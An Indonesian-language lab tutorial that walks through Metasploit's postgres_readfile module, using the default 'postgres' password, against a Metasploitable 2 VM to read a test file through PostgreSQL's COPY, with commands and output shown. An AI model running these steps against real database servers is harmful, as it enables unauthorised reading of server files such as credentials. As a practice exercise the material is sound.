Membaca Isi File Menggunakan Admin Postgres Auxiliary Modules
1. Cara Membaca Isi File Di OS Metasploitable 2 Menggunakan Admin
Postgres Auxiliary Modules
OS Target : Metasploitable 2 (Ubuntu Based)
OS Penyerang : Kali Linux
IP Target : 192.168.1.4
IP Penyerang : 192.168.1.2
Sumber Tutorial Referensi :
http://www.offensive-security.com/metasploit-unleashed/Admin_Postgres_Auxiliary_Modules
Dengan menggunakan postgres_readfile maka kita bisa membaca isi sebuah file. Dalam contoh ini
saya menggunakan file sederhana berformat .txt . Sebelum menjalankan module Metasploit
tersebut, saya membuat terlebih dahulu file bernama test.txt di lokasi:
/home/msfadmin
Saya membuatnya menggunakan text editor nano, isinya filenya berupa tulisan: haloooo .
Kemudian kita buka msfconsole di Kali Linux. Setelah masuk di msfconsole, langsung ketikan
perintah berikut ini:
use auxiliary/admin/postgres/postgres_readfile
Kemudian ketikan perintah:
set PASSWORD postgres
set RFILE /home/msfadmin/test.txt
set RHOST 192.168.1.4
run
Maka akan muncul hasil:
Query Text: 'CREATE TEMP TABLE QLouHd (INPUT TEXT);
COPY QLouHd FROM '/home/msfadmin/test.txt';
SELECT * FROM QLouHd'
=======================================================================
==========================================================
input
-----
haloooo